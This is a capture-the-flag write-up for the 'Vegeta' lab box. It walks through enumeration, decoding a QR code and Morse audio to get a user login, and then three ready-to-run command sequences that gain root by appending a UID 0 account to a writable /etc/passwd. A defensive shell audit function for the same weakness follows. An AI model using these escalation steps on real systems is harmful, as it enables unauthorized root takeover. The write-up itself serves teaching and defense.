Vegeta is one of the characters in the Dragon Ball series.
An interesting box, so let's do this!
Enumeration
Let's run nmap first and see what we get.
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38
Port 80
First things first: let's enumerate further to see whether we can find any files or directories.
Let's open robots.txt first. Did we find a directory?
We got an HTML file, but it contains nothing except Vegeta-1.0?
When we open the source code we find a base64-encoded string at the end of the page! After decoding it two times with base64 we get a QR code.
Let's see what we get here.
zbarimg <image file>
We got a possible password, but it is actually a rabbit hole haha. After I got some hints to enumerate more, I thought maybe we should use a custom wordlist of Dragon Ball characters. Let's run Gobuster again with our new custom wordlist (you can get it in the references below).
Inside the directory we find an audio file.
When we open the audio we can confirm that it is Morse code audio!
First User (trunks)
Let's decode the audio file using an online Morse code decoder.
We got a credential and we got our first user!
Root
Now that we have a user, let's use linpeas for more information.
Okay, that's what we want to see! A writable /etc/passwd!! There are a few ways to use this, but I chose these 3, using Perl, Python and OpenSSL.
First (Perl)
We can read .bash_history in the trunks directory.
Just follow these 4 steps and we will get to the root!
#First
perl -le 'print crypt("Password@973","addedsalt")'
#Second
echo 'Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd
#Third
su Tom
#Fourth
Password : Password@973
Second (Python)
#First
python -c 'import crypt; print(crypt.crypt("pass", "$6$salt"))'
#Second
echo 'Tom:$6$salt$3aEJgflnzWuw1O3tr0IYSmhUY0cZ7iBQeBP392T7RXjLP3TKKu3ddIapQaCpbD4p9ioeGaVIjOHaym7HvCuUm0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd
#Third
su Tom
#Fourth
Password : pass
Third (OpenSSL)
#First
openssl passwd -1 -salt Tom pass123
#Second
echo 'Tom:$1$Tom$3BObOqrD3qG2Zs.sgxkf4.:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd
#Third
su Tom
#Fourth
Password : pass123
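The same finding from the defender's side, as an added example that is not part of the original writeup: a shell function that flags the conditions all three methods rely on, namely a group- or world-writable passwd file, a second UID 0 account, and a hash stored in the password field. The names `audit_passwd` and `make_sample` and the finding labels are assumptions; the sample rows are constructed, reusing the entry shown in the Perl method.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for the weakness used in this writeup.
# Findings go to stdout, one per line; return status 0 = clean, 1 = findings.

audit_passwd() {
    _f="${1:-/etc/passwd}"
    # Mode string from ls, e.g. "-rw-r--r--": char 6 = group write, char 9 = other write.
    _perms=$(ls -ln "$_f" | awk '{print $1}')
    _out=$(
        case "$_perms" in
            (?????w*|????????w*) echo "WRITABLE mode=$_perms file=$_f" ;;
        esac
        awk -F: '
            /^#/ || NF < 7 { next }   # skip comments and malformed rows
            $3 == 0 && $1 != "root" { print "EXTRA_UID0 user=" $1 }
            $2 == "" { print "EMPTY_PASSWORD user=" $1; next }
            # Anything but x, * or ! means a hash is stored in passwd itself
            # and is used for authentication instead of the shadow entry.
            $2 !~ /^(x|\*|!+)$/ { print "INLINE_HASH user=" $1 }
        ' "$_f"
    )
    [ -z "$_out" ] && return 0
    printf '%s\n' "$_out"
    return 1
}

# Constructed sample: three ordinary rows plus the appended row from the Perl method.
make_sample() {
    _s=$(mktemp)
    cat > "$_s" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
trunks:x:1000:1000:trunks,,,:/home/trunks:/bin/bash
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
EOF
    chmod 666 "$_s"   # assumed mode, to reproduce the writable condition
    echo "$_s"
}
```

Called with no argument, `audit_passwd` checks the live /etc/passwd; the expected state is mode 0644 with `x` in every password field and root as the only UID 0 account.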
If you have any suggestions, or if there is something that I can improve, please do tell me. I hope this writeup helps someone, and let's learn together :)
References
- https://www.systutorials.com/docs/linux/man/1-zbarimg/
- https://github.com/H0j3n/Encounter_Wordlist/blob/master/dragonball_character.txt
- https://morsecode.world/international/decoder/audio-decoder-adaptive.html
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
- https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/